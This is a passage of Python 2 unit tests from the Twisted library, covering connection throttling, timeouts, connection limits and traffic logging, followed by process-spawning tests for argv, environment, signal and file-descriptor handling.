self.assertEquals(len(tServer.protocols.keys()), 2)
return results
def _lose1(results):
# disconnect one protocol and now another should be able to connect
c1.transport.loseConnection()
return c1.dDisconnected
def _connect4(results):
reactor.connectTCP("127.0.0.1", n, SillyFactory(c4))
return c4.dConnected
def _check4(results):
self.assertEquals(c4.connected, 1)
self.assertEquals(c4.disconnected, 0)
return results
def _cleanup(results):
for c in c2, c4:
c.transport.loseConnection()
return defer.DeferredList([
defer.maybeDeferred(p.stopListening),
c2.dDisconnected,
c4.dDisconnected])
wrapTServer.deferred.addCallback(_connect123)
wrapTServer.deferred.addCallback(_check123)
wrapTServer.deferred.addCallback(_lose1)
wrapTServer.deferred.addCallback(_connect4)
wrapTServer.deferred.addCallback(_check4)
wrapTServer.deferred.addCallback(_cleanup)
return wrapTServer.deferred
def testWriteLimit(self):
server = Server()
c1, c2 = SimpleProtocol(), SimpleProtocol()
# The throttling factory starts checking bandwidth immediately
now = time.time()
tServer = policies.ThrottlingFactory(server, writeLimit=10)
port = reactor.listenTCP(0, tServer, interface="127.0.0.1")
n = port.getHost()[2]
reactor.iterate(); reactor.iterate()
for c in c1, c2:
reactor.connectTCP("127.0.0.1", n, SillyFactory(c))
self.doIterations()
for p in tServer.protocols.keys():
p = p.wrappedProtocol
self.assert_(isinstance(p, EchoProtocol))
p.transport.registerProducer(p, 1)
c1.transport.write("0123456789")
c2.transport.write("abcdefghij")
self.doIterations()
self.assertEquals(c1.buffer, "0123456789")
self.assertEquals(c2.buffer, "abcdefghij")
self.assertEquals(tServer.writtenThisSecond, 20)
# at this point server should've written 20 bytes, 10 bytes
# above the limit so writing should be paused around 1 second
# from 'now', and resumed a second after that
for p in tServer.protocols.keys():
self.assert_(not hasattr(p.wrappedProtocol, "paused"))
self.assert_(not hasattr(p.wrappedProtocol, "resume"))
while not hasattr(p.wrappedProtocol, "paused"):
reactor.iterate()
self.assertEquals(tServer.writtenThisSecond, 0)
for p in tServer.protocols.keys():
self.assert_(hasattr(p.wrappedProtocol, "paused"))
self.assert_(not hasattr(p.wrappedProtocol, "resume"))
self.assert_(abs(p.wrappedProtocol.paused - now - 1.0) < 0.1)
while not hasattr(p.wrappedProtocol, "resume"):
reactor.iterate()
for p in tServer.protocols.keys():
self.assert_(hasattr(p.wrappedProtocol, "resume"))
self.assert_(abs(p.wrappedProtocol.resume -
p.wrappedProtocol.paused - 1.0) < 0.1)
c1.transport.loseConnection()
c2.transport.loseConnection()
port.stopListening()
for p in tServer.protocols.keys():
p.loseConnection()
self.doIterations()
def testReadLimit(self):
server = Server()
c1, c2 = SimpleProtocol(), SimpleProtocol()
now = time.time()
tServer = policies.ThrottlingFactory(server, readLimit=10)
port = reactor.listenTCP(0, tServer, interface="127.0.0.1")
n = port.getHost()[2]
self.doIterations()
for c in c1, c2:
reactor.connectTCP("127.0.0.1", n, SillyFactory(c))
self.doIterations()
c1.transport.write("0123456789")
c2.transport.write("abcdefghij")
self.doIterations()
self.assertEquals(c1.buffer, "0123456789")
self.assertEquals(c2.buffer, "abcdefghij")
self.assertEquals(tServer.readThisSecond, 20)
# we wrote 20 bytes, so after one second it should stop reading
# and then a second later start reading again
while time.time() - now < 1.05:
reactor.iterate()
self.assertEquals(tServer.readThisSecond, 0)
# write some more - data should *not* get written for another second
c1.transport.write("0123456789")
c2.transport.write("abcdefghij")
self.doIterations()
self.assertEquals(c1.buffer, "0123456789")
self.assertEquals(c2.buffer, "abcdefghij")
self.assertEquals(tServer.readThisSecond, 0)
while time.time() - now < 2.05:
reactor.iterate()
self.assertEquals(c1.buffer, "01234567890123456789")
self.assertEquals(c2.buffer, "abcdefghijabcdefghij")
c1.transport.loseConnection()
c2.transport.loseConnection()
port.stopListening()
for p in tServer.protocols.keys():
p.loseConnection()
self.doIterations()
# These fail intermittently.
testReadLimit.skip = "Inaccurate tests are worse than no tests."
testWriteLimit.skip = "Inaccurate tests are worse than no tests."
class TimeoutTestCase(unittest.TestCase):
def setUpClass(self):
self.clock = Clock()
self.clock.install()
def tearDownClass(self):
self.clock.uninstall()
def _serverSetup(self):
# Create a server factory, get a protocol from it, connect it to a
# transport, and return all three.
wrappedFactory = protocol.ServerFactory()
wrappedFactory.protocol = SimpleProtocol
factory = policies.TimeoutFactory(wrappedFactory, 3)
proto = factory.buildProtocol(address.IPv4Address('TCP', '127.0.0.1', 12345))
transport = StringTransportWithDisconnection()
transport.protocol = proto
proto.makeConnection(transport)
return factory, proto, transport
def testTimeout(self):
# Make sure that when a TimeoutFactory accepts a connection, it will
# time out that connection if no data is read or written within the
# timeout period.
# Make the server-side connection
factory, proto, transport = self._serverSetup()
# Let almost 3 time units pass
self.clock.pump(reactor, [0.0, 0.5, 1.0, 1.0, 0.4])
self.failIf(proto.wrappedProtocol.disconnected)
# Now let the timer elapse
self.clock.pump(reactor, [0.0, 0.2])
self.failUnless(proto.wrappedProtocol.disconnected)
def testSendAvoidsTimeout(self):
# Make sure that writing data to a transport from a protocol
# constructed by a TimeoutFactory resets the timeout countdown.
# Make the server-side connection
factory, proto, transport = self._serverSetup()
# Let half the countdown period elapse
self.clock.pump(reactor, [0.0, 0.5, 1.0])
self.failIf(proto.wrappedProtocol.disconnected)
# Send some data (proto is the /real/ proto's transport, so this is
# the write that gets called)
proto.write('bytes bytes bytes')
# More time passes, putting us past the original timeout
self.clock.pump(reactor, [0.0, 1.0, 1.0])
self.failIf(proto.wrappedProtocol.disconnected)
# Make sure writeSequence delays timeout as well
proto.writeSequence(['bytes'] * 3)
# Tick tock
self.clock.pump(reactor, [0.0, 1.0, 1.0])
self.failIf(proto.wrappedProtocol.disconnected)
# Don't write anything more, just let the timeout expire
self.clock.pump(reactor, [0.0, 2.0])
self.failUnless(proto.wrappedProtocol.disconnected)
def testReceiveAvoidsTimeout(self):
# Make sure that receiving data also resets the timeout countdown.
# Make the server-side connection
factory, proto, transport = self._serverSetup()
# Let half the countdown period elapse
self.clock.pump(reactor, [0.0, 1.0, 0.5])
self.failIf(proto.wrappedProtocol.disconnected)
# Some bytes arrive, they should reset the counter
proto.dataReceived('bytes bytes bytes')
# We pass the original timeout
self.clock.pump(reactor, [0.0, 1.0, 1.0])
self.failIf(proto.wrappedProtocol.disconnected)
# Nothing more arrives though, the new timeout deadline is passed,
# the connection should be dropped.
self.clock.pump(reactor, [0.0, 1.0, 1.0])
self.failUnless(proto.wrappedProtocol.disconnected)
class TimeoutTester(protocol.Protocol, policies.TimeoutMixin):
timeOut = 3
timedOut = 0
def connectionMade(self):
self.setTimeout(self.timeOut)
def dataReceived(self, data):
self.resetTimeout()
protocol.Protocol.dataReceived(self, data)
def connectionLost(self, reason=None):
self.setTimeout(None)
def timeoutConnection(self):
self.timedOut = 1
class TestTimeout(unittest.TestCase):
def setUpClass(self):
self.clock = Clock()
self.clock.install()
def tearDownClass(self):
self.clock.uninstall()
def testOverriddenCallLater(self):
"""
Test that setting callLater on a subclass of TimeoutMixin causes the
protocol to use that callable instead of C{reactor.callLater}.
"""
calls = []
p = TimeoutTester()
p.callLater = lambda *a, **kw: calls.append((a, kw))
p.setTimeout(10)
self.assertEquals(len(calls), 1)
def testTimeout(self):
p = TimeoutTester()
s = StringIOWithoutClosing()
p.makeConnection(protocol.FileWrapper(s))
self.clock.pump(reactor, [0, 0.5, 1.0, 1.0])
self.failIf(p.timedOut)
self.clock.pump(reactor, [0, 1.0])
self.failUnless(p.timedOut)
def testNoTimeout(self):
p = TimeoutTester()
s = StringIOWithoutClosing()
p.makeConnection(protocol.FileWrapper(s))
self.clock.pump(reactor, [0, 0.5, 1.0, 1.0])
self.failIf(p.timedOut)
p.dataReceived('hello there')
self.clock.pump(reactor, [0, 1.0, 1.0, 0.5])
self.failIf(p.timedOut)
self.clock.pump(reactor, [0, 1.0])
self.failUnless(p.timedOut)
def testResetTimeout(self):
p = TimeoutTester()
p.timeOut = None
s = StringIOWithoutClosing()
p.makeConnection(protocol.FileWrapper(s))
p.setTimeout(1)
self.assertEquals(p.timeOut, 1)
self.clock.pump(reactor, [0, 0.9])
self.failIf(p.timedOut)
self.clock.pump(reactor, [0, 0.2])
self.failUnless(p.timedOut)
def testCancelTimeout(self):
p = TimeoutTester()
p.timeOut = 5
s = StringIOWithoutClosing()
p.makeConnection(protocol.FileWrapper(s))
p.setTimeout(None)
self.assertEquals(p.timeOut, None)
self.clock.pump(reactor, [0, 5, 5, 5])
self.failIf(p.timedOut)
def testReturn(self):
p = TimeoutTester()
p.timeOut = 5
self.assertEquals(p.setTimeout(10), 5)
self.assertEquals(p.setTimeout(None), 10)
self.assertEquals(p.setTimeout(1), None)
self.assertEquals(p.timeOut, 1)
# Clean up the DelayedCall
p.setTimeout(None)
class LimitTotalConnectionsFactoryTestCase(unittest.TestCase):
"""Tests for policies.LimitTotalConnectionsFactory"""
def testConnectionCounting(self):
# Make a basic factory
factory = policies.LimitTotalConnectionsFactory()
factory.protocol = protocol.Protocol
# connectionCount starts at zero
self.assertEqual(0, factory.connectionCount)
# connectionCount increments as connections are made
p1 = factory.buildProtocol(None)
self.assertEqual(1, factory.connectionCount)
p2 = factory.buildProtocol(None)
self.assertEqual(2, factory.connectionCount)
# and decrements as they are lost
p1.connectionLost(None)
self.assertEqual(1, factory.connectionCount)
p2.connectionLost(None)
self.assertEqual(0, factory.connectionCount)
def testConnectionLimiting(self):
# Make a basic factory with a connection limit of 1
factory = policies.LimitTotalConnectionsFactory()
factory.protocol = protocol.Protocol
factory.connectionLimit = 1
# Make a connection
p = factory.buildProtocol(None)
self.assertNotEqual(None, p)
self.assertEqual(1, factory.connectionCount)
# Try to make a second connection, which will exceed the connection
# limit. This should return None, because overflowProtocol is None.
self.assertEqual(None, factory.buildProtocol(None))
self.assertEqual(1, factory.connectionCount)
# Define an overflow protocol
class OverflowProtocol(protocol.Protocol):
def connectionMade(self):
factory.overflowed = True
factory.overflowProtocol = OverflowProtocol
factory.overflowed = False
# Try to make a second connection again, now that we have an overflow
# protocol. Note that overflow connections count towards the connection
# count.
op = factory.buildProtocol(None)
op.makeConnection(None) # to trigger connectionMade
self.assertEqual(True, factory.overflowed)
self.assertEqual(2, factory.connectionCount)
# Close the connections.
p.connectionLost(None)
self.assertEqual(1, factory.connectionCount)
op.connectionLost(None)
self.assertEqual(0, factory.connectionCount)
class WriteSequenceEchoProtocol(EchoProtocol):
def dataReceived(self, bytes):
if bytes.find('vector!') != -1:
self.transport.writeSequence([bytes])
else:
EchoProtocol.dataReceived(self, bytes)
class TestLoggingFactory(policies.TrafficLoggingFactory):
openFile = None
def open(self, name):
assert self.openFile is None, "open() called too many times"
self.openFile = StringIO()
return self.openFile
class LoggingFactoryTestCase(unittest.TestCase):
def testThingsGetLogged(self):
wrappedFactory = Server()
wrappedFactory.protocol = WriteSequenceEchoProtocol
t = StringTransportWithDisconnection()
f = TestLoggingFactory(wrappedFactory, 'test')
p = f.buildProtocol(('1.2.3.4', 5678))
t.protocol = p
p.makeConnection(t)
v = f.openFile.getvalue()
self.failUnless('*' in v, "* not found in %r" % (v,))
self.failIf(t.value())
p.dataReceived('here are some bytes')
v = f.openFile.getvalue()
self.assertNotEqual(-1, v.find("C 1: 'here are some bytes'"), "Expected client string not found in %r" % (v,))
self.assertNotEqual(-1, v.find("S 1: 'here are some bytes'"), "Expected server string not found in %r" % (v,))
self.assertEquals(t.value(), 'here are some bytes')
t.clear()
p.dataReceived('prepare for vector! to the extreme')
v = f.openFile.getvalue()
self.assertNotEqual(-1, v.find("SV 1: ['prepare for vector! to the extreme']"), "Expected server string not found in %r" % (v,))
self.assertEquals(t.value(), 'prepare for vector! to the extreme')
p.loseConnection()
v = f.openFile.getvalue()
self.assertNotEqual(-1, v.find('ConnectionDone'), "Connection done notification not found in %r" % (v,))
```
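For orientation, here is a minimal sketch of how the wrappers exercised above are applied to a real server, assuming a trivial echo protocol and an arbitrary port number (both illustrative): `TimeoutFactory` drops idle connections and `ThrottlingFactory` caps the factory-wide write rate. The same idle-timeout behaviour can also be built into a single protocol with `policies.TimeoutMixin`, as `TimeoutTester` above does.

```python
from twisted.internet import protocol, reactor
from twisted.protocols import policies

class Echo(protocol.Protocol):
    def dataReceived(self, data):
        self.transport.write(data)

factory = protocol.ServerFactory()
factory.protocol = Echo

# Drop connections that are idle for 30 seconds, and limit the whole
# server to writing at most 10000 bytes per second.
wrapped = policies.ThrottlingFactory(
    policies.TimeoutFactory(factory, 30), writeLimit=10000)

reactor.listenTCP(8000, wrapped)
reactor.run()
```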
#### File: twisted/test/test_process.py
```python
from __future__ import nested_scopes, generators
from twisted.trial import unittest
from twisted.python import log
import gzip
import os
import popen2
import sys
import signal
import warnings
from pprint import pformat
try:
import cStringIO as StringIO
except ImportError:
import StringIO
# Twisted Imports
from twisted.internet import reactor, protocol, error, interfaces, defer
from twisted.internet.protocol import ProcessProtocol
from twisted.internet.defer import Deferred
from twisted.python import util, runtime
from twisted.python import procutils
class TrivialProcessProtocol(protocol.ProcessProtocol):
def __init__(self, d):
self.deferred = d
def processEnded(self, reason):
self.reason = reason
self.deferred.callback(None)
class TestProcessProtocol(protocol.ProcessProtocol):
def connectionMade(self):
self.stages = [1]
self.data = ''
self.err = ''
self.transport.write("abcd")
def outReceived(self, data):
self.data = self.data + data
def outConnectionLost(self):
self.stages.append(2)
if self.data != "abcd":
raise RuntimeError
self.transport.write("1234")
def errReceived(self, data):
self.err = self.err + data
def errConnectionLost(self):
self.stages.append(3)
if self.err != "1234":
print 'err != 1234: ' + repr(self.err)
raise RuntimeError()
self.transport.write("abcd")
self.stages.append(4)
def inConnectionLost(self):
self.stages.append(5)
def processEnded(self, reason):
self.reason = reason
self.deferred.callback(None)
class EchoProtocol(protocol.ProcessProtocol):
s = "1234567" * 1001
n = 10
finished = 0
failure = None
def __init__(self, onEnded):
self.onEnded = onEnded
self.count = 0
def connectionMade(self):
assert self.n > 2
for i in range(self.n - 2):
self.transport.write(self.s)
# test writeSequence
self.transport.writeSequence([self.s, self.s])
self.buffer = self.s * self.n
def outReceived(self, data):
if buffer(self.buffer, self.count, len(data)) != buffer(data):
self.failure = ("wrong bytes received", data, self.count)
self.transport.closeStdin()
else:
self.count += len(data)
if self.count == len(self.buffer):
self.transport.closeStdin()
def processEnded(self, reason):
self.finished = 1
if not reason.check(error.ProcessDone):
self.failure = "process didn't terminate normally: " + str(reason)
self.onEnded.callback(self)
class SignalProtocol(protocol.ProcessProtocol):
def __init__(self, deferred, sig):
self.deferred = deferred
self.signal = sig
def outReceived(self, data):
self.transport.signalProcess(self.signal)
def processEnded(self, reason):
if not reason.check(error.ProcessTerminated):
self.deferred.callback("wrong termination: %s" % reason)
return
v = reason.value
if v.exitCode is not None:
self.deferred.callback("SIG%s: exitCode is %s, not None" %
(self.signal, v.exitCode))
return
if v.signal != getattr(signal,'SIG'+self.signal):
self.deferred.callback("SIG%s: .signal was %s, wanted %s" %
(self.signal, v.signal,
getattr(signal,'SIG'+self.signal)))
return
if os.WTERMSIG(v.status) != getattr(signal,'SIG'+self.signal):
self.deferred.callback('SIG%s: %s'
% (self.signal, os.WTERMSIG(v.status)))
return
self.deferred.callback(None)
class SignalMixin:
# XXX: Trial now does this (see
# twisted.trial.runner.MethodInfoBase._setUpSigchldHandler)... perhaps
# this class should be removed? Or trial shouldn't bother, and this
# class used where it matters?
# - spiv, 2005-04-01
sigchldHandler = None
def setUpClass(self):
# make sure SIGCHLD handler is installed, as it should be on
# reactor.run(). Do this because the reactor may not have been run
# by the time this test runs.
if hasattr(reactor, "_handleSigchld") and hasattr(signal, "SIGCHLD"):
log.msg("Installing SIGCHLD signal handler.")
self.sigchldHandler = signal.signal(signal.SIGCHLD,
reactor._handleSigchld)
else:
log.msg("Skipped installing SIGCHLD signal handler.")
def tearDownClass(self):
if self.sigchldHandler:
log.msg("Uninstalled SIGCHLD signal handler.")
signal.signal(signal.SIGCHLD, self.sigchldHandler)
class TestManyProcessProtocol(TestProcessProtocol):
def __init__(self):
self.deferred = defer.Deferred()
def processEnded(self, reason):
self.reason = reason
if reason.check(error.ProcessDone):
self.deferred.callback(None)
else:
self.deferred.errback(reason)
class UtilityProcessProtocol(ProcessProtocol):
"""
Helper class for launching a Python process and getting a result from it.
@ivar program: A string giving a Python program for the child process to
run.
"""
program = None
def run(cls, reactor, argv, env):
"""
Run a Python process connected to a new instance of this protocol
class. Return the protocol instance.
The Python process is given C{self.program} on the command line to
execute, in addition to anything specified by C{argv}. C{env} is
the complete environment.
"""
exe = sys.executable
self = cls()
reactor.spawnProcess(
self, exe, [exe, "-c", self.program] + argv, env=env)
return self
run = classmethod(run)
def __init__(self):
self.bytes = []
self.requests = []
def parseChunks(self, bytes):
"""
Called with all bytes received on stdout when the process exits.
"""
raise NotImplementedError()
def getResult(self):
"""
Return a Deferred which will fire with the result of L{parseChunks}
when the child process exits.
"""
d = Deferred()
self.requests.append(d)
return d
def _fireResultDeferreds(self, result):
"""
Callback all Deferreds returned up until now by L{getResult}
with the given result object.
"""
requests = self.requests
self.requests = None
for d in requests:
d.callback(result)
def outReceived(self, bytes):
"""
Accumulate output from the child process in a list.
"""
self.bytes.append(bytes)
def processEnded(self, reason):
"""
Handle process termination by parsing all received output and firing
any waiting Deferreds.
"""
self._fireResultDeferreds(self.parseChunks(self.bytes))
class GetArgumentVector(UtilityProcessProtocol):
"""
Protocol which will read a serialized argv from a process and
expose it to interested parties.
"""
program = (
"from sys import stdout, argv\n"
"stdout.write(chr(0).join(argv))\n"
"stdout.flush()\n")
def parseChunks(self, chunks):
"""
Parse the output from the process to which this protocol was
connected, which is a single unterminated line of \\0-separated
strings giving the argv of that process. Return this as a list of
str objects.
"""
return ''.join(chunks).split('\0')
class GetEnvironmentDictionary(UtilityProcessProtocol):
"""
Protocol which will read a serialized environment dict from a process
and expose it to interested parties.
"""
program = (
"from sys import stdout\n"
"from os import environ\n"
"items = environ.iteritems()\n"
"stdout.write(chr(0).join([k + chr(0) + v for k, v in items]))\n"
"stdout.flush()\n")
def parseChunks(self, chunks):
"""
Parse the output from the process to which this protocol was
connected, which is a single unterminated line of \\0-separated
strings giving key value pairs of the environment from that process.
Return this as a dictionary.
"""
environString = ''.join(chunks)
if not environString:
return {}
environ = iter(environString.split('\0'))
d = {}
while 1:
try:
k = environ.next()
except StopIteration:
break
else:
v = environ.next()
d[k] = v
return d
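# Usage sketch (illustrative, mirroring how the tests below drive these
# helpers): a UtilityProcessProtocol subclass is started with run() and the
# parsed child output is obtained through getResult(), e.g.
#
#   proto = GetEnvironmentDictionary.run(reactor, [], {'KEY': 'value'})
#   d = proto.getResult()
#   d.addCallback(lambda environ: environ.get('KEY'))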
class ProcessTestCase(SignalMixin, unittest.TestCase):
"""Test running a process."""
usePTY = False
def testStdio(self):
"""twisted.internet.stdio test."""
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_twisted.py")
p = Accumulator()
d = p.endedDeferred = defer.Deferred()
env = {"PYTHONPATH": os.pathsep.join(sys.path)}
reactor.spawnProcess(p, exe, [exe, "-u", scriptPath], env=env,
path=None, usePTY=self.usePTY)
p.transport.write("hello, world")
p.transport.write("abc")
p.transport.write("123")
p.transport.closeStdin()
def processEnded(ign):
self.assertEquals(p.outF.getvalue(), "hello, worldabc123",
"Output follows:\n"
"%s\n"
"Error message from process_twisted follows:\n"
"%s\n" % (p.outF.getvalue(), p.errF.getvalue()))
return d.addCallback(processEnded)
def testProcess(self):
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_tester.py")
d = defer.Deferred()
p = TestProcessProtocol()
p.deferred = d
reactor.spawnProcess(p, exe, [exe, "-u", scriptPath], env=None)
def check(ignored):
self.assertEquals(p.stages, [1, 2, 3, 4, 5])
f = p.reason
f.trap(error.ProcessTerminated)
self.assertEquals(f.value.exitCode, 23)
# would .signal be available on non-posix?
# self.assertEquals(f.value.signal, None)
try:
import process_tester, glob
for f in glob.glob(process_tester.test_file_match):
os.remove(f)
except:
pass
d.addCallback(check)
return d
def testManyProcesses(self):
def _check(results, protocols):
for p in protocols:
self.assertEquals(p.stages, [1, 2, 3, 4, 5], "[%d] stages = %s" % (id(p.transport), str(p.stages)))
# test status code
f = p.reason
f.trap(error.ProcessTerminated)
self.assertEquals(f.value.exitCode, 23)
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_tester.py")
args = [exe, "-u", scriptPath]
protocols = []
deferreds = []
for i in xrange(50):
p = TestManyProcessProtocol()
protocols.append(p)
reactor.spawnProcess(p, exe, args, env=None)
deferreds.append(p.deferred)
deferredList = defer.DeferredList(deferreds, consumeErrors=True)
deferredList.addCallback(_check, protocols)
return deferredList
def testEcho(self):
finished = defer.Deferred()
p = EchoProtocol(finished)
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_echoer.py")
reactor.spawnProcess(p, exe, [exe, "-u", scriptPath], env=None)
def asserts(ignored):
self.failIf(p.failure, p.failure)
self.failUnless(hasattr(p, 'buffer'))
self.assertEquals(len(''.join(p.buffer)), len(p.s * p.n))
def takedownProcess(err):
p.transport.closeStdin()
return err
return finished.addCallback(asserts).addErrback(takedownProcess)
testEcho.timeout = 60 # XXX This should not be. There is already a
# global timeout value. Why do you think this
# test can complete more quickly?
def testCommandLine(self):
args = [r'a\"b ', r'a\b ', r' a\\"b', r' a\\b', r'"foo bar" "', '\tab', '"\\', 'a"b', "a'b"]
pyExe = sys.executable
scriptPath = util.sibpath(__file__, "process_cmdline.py")
p = Accumulator()
d = p.endedDeferred = defer.Deferred()
reactor.spawnProcess(p, pyExe, [pyExe, "-u", scriptPath]+args, env=None,
path=None)
def processEnded(ign):
self.assertEquals(p.errF.getvalue(), "")
recvdArgs = p.outF.getvalue().splitlines()
self.assertEquals(recvdArgs, args)
return d.addCallback(processEnded)
def test_wrongArguments(self):
"""
Test invalid arguments to spawnProcess: arguments and environment
must only contains string or unicode, and not null bytes.
"""
exe = sys.executable
p = protocol.ProcessProtocol()
badEnvs = [
{"foo": 2},
{"foo": "egg\0a"},
{3: "bar"},
{"bar\0foo": "bar"}]
badArgs = [
[exe, 2],
"spam",
[exe, "foo\0bar"]]
# Sanity check - this will fail for people who have mucked with
# their site configuration in a stupid way, but there's nothing we
# can do about that.
badUnicode = u'\N{SNOWMAN}'
try:
badUnicode.encode(sys.getdefaultencoding())
except UnicodeEncodeError:
# Okay, that unicode doesn't encode, put it in as a bad environment
# key.
badEnvs.append({badUnicode: 'value for bad unicode key'})
badEnvs.append({'key for bad unicode value': badUnicode})
badArgs.append([exe, badUnicode])
else:
# It _did_ encode. Most likely, Gtk2 is being used and the
# default system encoding is UTF-8, which can encode anything.
# In any case, if implicit unicode -> str conversion works for
# that string, we can't test that TypeError gets raised instead,
# so just leave it off.
pass
for env in badEnvs:
self.assertRaises(
TypeError,
reactor.spawnProcess, p, exe, [exe, "-c", ""], env=env)
for args in badArgs:
self.assertRaises(
TypeError,
reactor.spawnProcess, p, exe, args, env=None)
# Use upper-case so that the environment key test uses an upper case
# name: some versions of Windows only support upper case environment
# variable names, and I think Python (as of 2.5) doesn't use the right
# syscall for lowercase or mixed case names to work anyway.
okayUnicode = u"UNICODE"
encodedValue = "UNICODE"
def _deprecatedUnicodeSupportTest(self, processProtocolClass, argv=[], env={}):
"""
Check that a deprecation warning is emitted when passing unicode to
spawnProcess for an argv value or an environment key or value.
Check that the warning is of the right type, has the right message,
and refers to the correct file. Unfortunately, don't check that the
line number is correct, because that is too hard for me to figure
out.
@param processProtocolClass: A L{UtilityProcessProtocol} subclass
which will be instantiated to communicate with the child process.
@param argv: The argv argument to spawnProcess.
@param env: The env argument to spawnProcess.
@return: A Deferred which fires when the test is complete.
"""
# Sanity to check to make sure we can actually encode this unicode
# with the default system encoding. This may be excessively
# paranoid. -exarkun
self.assertEqual(
self.okayUnicode.encode(sys.getdefaultencoding()),
self.encodedValue)
warningsShown = []
def showwarning(*args):
warningsShown.append(args)
origshow = warnings.showwarning
origregistry = globals().get('__warningregistry__', {})
try:
warnings.showwarning = showwarning
globals()['__warningregistry__'] = {}
p = processProtocolClass.run(reactor, argv, env)
finally:
warnings.showwarning = origshow
globals()['__warningregistry__'] = origregistry
d = p.getResult()
self.assertEqual(len(warningsShown), 1, pformat(warningsShown))
message, category, filename, lineno = warningsShown[0]
self.assertEqual(
message.args,
("Argument strings and environment keys/values passed to "
"reactor.spawnProcess should be str, not unicode.",))
self.assertIdentical(category, DeprecationWarning)
# Use starts with because of .pyc/.pyo issues.
self.failUnless(
__file__.startswith(filename),
'Warning in %r, expected %r' % (filename, __file__))
# It would be nice to be able to check the line number as well, but
# different configurations actually end up reporting different line
# numbers (generally the variation is only 1 line, but that's enough
# to fail the test erroneously...).
# self.assertEqual(lineno, 202)
return d
def test_deprecatedUnicodeArgvSupport(self):
"""
Test that a unicode string passed for an argument value is allowed
if it can be encoded with the default system encoding, but that a
deprecation warning is emitted.
"""
d = self._deprecatedUnicodeSupportTest(GetArgumentVector, argv=[self.okayUnicode])
def gotArgVector(argv):
self.assertEqual(argv, ['-c', self.encodedValue])
d.addCallback(gotArgVector)
return d
def test_deprecatedUnicodeEnvKeySupport(self):
"""
Test that a unicode string passed for the key of the environment
dictionary is allowed if it can be encoded with the default system
encoding, but that a deprecation warning is emitted.
"""
d = self._deprecatedUnicodeSupportTest(
GetEnvironmentDictionary, env={self.okayUnicode: self.encodedValue})
def gotEnvironment(environ):
self.assertEqual(environ[self.encodedValue], self.encodedValue)
d.addCallback(gotEnvironment)
return d
def test_deprecatedUnicodeEnvValueSupport(self):
"""
Test that a unicode string passed for the value of the environment
dictionary is allowed if it can be encoded with the default system
encoding, but that a deprecation warning is emitted.
"""
d = self._deprecatedUnicodeSupportTest(
GetEnvironmentDictionary, env={self.encodedValue: self.okayUnicode})
def gotEnvironment(environ):
# On Windows, the environment contains more things than we
# specified, so only make sure that at least the key we wanted
# is there, rather than testing the dictionary for exact
# equality.
self.assertEqual(environ[self.encodedValue], self.encodedValue)
d.addCallback(gotEnvironment)
return d
class TwoProcessProtocol(protocol.ProcessProtocol):
num = -1
finished = 0
def __init__(self):
self.deferred = defer.Deferred()
def outReceived(self, data):
pass
def processEnded(self, reason):
self.finished = 1
self.deferred.callback(None)
class TestTwoProcessesBase:
def setUp(self):
self.processes = [None, None]
self.pp = [None, None]
self.done = 0
self.verbose = 0
def createProcesses(self, usePTY=0):
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_reader.py")
for num in (0,1):
self.pp[num] = TwoProcessProtocol()
self.pp[num].num = num
p = reactor.spawnProcess(self.pp[num],
exe, [exe, "-u", scriptPath], env=None,
usePTY=usePTY)
self.processes[num] = p
def close(self, num):
if self.verbose: print "closing stdin [%d]" % num
p = self.processes[num]
pp = self.pp[num]
self.failIf(pp.finished, "Process finished too early")
p.loseConnection()
if self.verbose: print self.pp[0].finished, self.pp[1].finished
def _onClose(self):
return defer.gatherResults([ p.deferred for p in self.pp ])
def testClose(self):
if self.verbose: print "starting processes"
self.createProcesses()
reactor.callLater(1, self.close, 0)
reactor.callLater(2, self.close, 1)
return self._onClose()
class TestTwoProcessesNonPosix(TestTwoProcessesBase, SignalMixin, unittest.TestCase):
pass
class TestTwoProcessesPosix(TestTwoProcessesBase, SignalMixin, unittest.TestCase):
def tearDown(self):
for i in (0,1):
pp, process = self.pp[i], self.processes[i]
if not pp.finished:
try:
os.kill(process.pid, signal.SIGTERM)
except OSError:
print "OSError"
return self._onClose()
def kill(self, num):
if self.verbose: print "kill [%d] with SIGTERM" % num
p = self.processes[num]
pp = self.pp[num]
self.failIf(pp.finished, "Process finished too early")
os.kill(p.pid, signal.SIGTERM)
if self.verbose: print self.pp[0].finished, self.pp[1].finished
def testKill(self):
if self.verbose: print "starting processes"
self.createProcesses(usePTY=0)
reactor.callLater(1, self.kill, 0)
reactor.callLater(2, self.kill, 1)
return self._onClose()
def testClosePty(self):
if self.verbose: print "starting processes"
self.createProcesses(usePTY=1)
reactor.callLater(1, self.close, 0)
reactor.callLater(2, self.close, 1)
return self._onClose()
def testKillPty(self):
if self.verbose: print "starting processes"
self.createProcesses(usePTY=1)
reactor.callLater(1, self.kill, 0)
reactor.callLater(2, self.kill, 1)
return self._onClose()
class FDChecker(protocol.ProcessProtocol):
state = 0
data = ""
failed = None
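    # The checker is a small state machine driven by the child's extra FDs:
    #   state 1: "abcd" written to child fd 0; wait for "righto" on child fd 1
    #   state 2: "efgh" written to child fd 3; wait for childConnectionLost(4)
    #   state 3: child fd 5 closed; wait for "closed" on child fd 1
    #   state 4: all exchanges done; processEnded must report a clean exit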
def __init__(self, d):
self.deferred = d
def fail(self, why):
self.failed = why
self.deferred.callback(None)
def connectionMade(self):
self.transport.writeToChild(0, "abcd")
self.state = 1
def childDataReceived(self, childFD, data):
#print "[%d] dataReceived(%d,%s)" % (self.state, childFD, data)
if self.state == 1:
if childFD != 1:
self.fail("read '%s' on fd %d (not 1) during state 1" \
% (childFD, data))
return
self.data += data
#print "len", len(self.data)
if len(self.data) == 6:
if self.data != "righto":
self.fail("got '%s' on fd1, expected 'righto'" \
% self.data)
return
self.data = ""
self.state = 2
#print "state2", self.state
self.transport.writeToChild(3, "efgh")
return
if self.state == 2:
self.fail("read '%s' on fd %s during state 2" % (childFD, data))
return
if self.state == 3:
if childFD != 1:
self.fail("read '%s' on fd %s (not 1) during state 3" \
% (childFD, data))
return
self.data += data
if len(self.data) == 6:
if self.data != "closed":
self.fail("got '%s' on fd1, expected 'closed'" \
% self.data)
return
self.state = 4
return
if self.state == 4:
self.fail("read '%s' on fd %s during state 4" % (childFD, data))
return
def childConnectionLost(self, childFD):
#print "[%d] connectionLost(%d)" % (self.state, childFD)
if self.state == 1:
self.fail("got connectionLost(%d) during state 1" % childFD)
return
if self.state == 2:
if childFD != 4:
